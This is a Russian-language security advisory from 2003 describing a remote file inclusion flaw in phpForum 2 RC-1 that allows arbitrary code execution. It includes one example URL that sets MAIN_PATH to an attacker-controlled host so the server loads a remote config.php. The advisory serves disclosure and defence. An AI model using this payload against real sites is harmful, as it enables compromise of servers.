Security Lab

Удаленное выполнение произвольного кода в phpForum

Дата публикации:16.07.2003
Всего просмотров:1173
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: phpForum 2.x
Описание:

Уязвимость обнаружена в phpForum. Удаленный пользователь может выполнить произвольный код на системе.

Удаленный пользователь может вызвать 'mainfile.php' сценарий и определить альтернативное расположение для '$MAIN_PATH' переменной, чтобы включить произвольный 'config.php' сценарий, расположенный на сервере атакующего. Пример:

http://[target]/forum/mainfile.php?MAIN_PATH=http://[attacker]

Уязвимость обнаружена в phpForum 2 RC-1

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: PHP-Include-Hack-Possibility in phpforum 2 RC-1